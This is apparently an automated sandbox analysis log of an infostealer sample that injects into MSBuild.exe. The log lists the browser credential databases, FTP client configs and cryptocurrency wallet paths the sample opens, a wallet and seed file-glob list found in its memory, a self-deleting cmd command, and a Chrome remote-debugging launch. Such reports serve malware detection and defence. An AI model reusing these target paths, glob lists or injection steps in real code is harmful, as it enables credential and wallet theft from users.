Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040E886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040D84A lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrcpyA,lstrcatA, 2_2_0040D84A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 2_2_0040F029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 2_2_0040F0CA
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41D000 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41F000 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 421000 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 973008 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\qimg4" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 2_2_0040DE1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Queries volume information: C:\Users\user\Desktop\x9Lh8czsmo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00417652 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 2_2_00417652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00414E31 EntryPoint,GetUserNameW,GetComputerNameW, 2_2_00414E31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 2_2_0040DDBF
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \MultiDoge\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: x9Lh8czsmo.exe, 00000000.00000002.1441635562.0000000004EB0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: MSBuild.exe, 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Yara match File source: 00000002.00000002.1987744561.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x9Lh8czsmo.exe PID: 7828, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7908, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs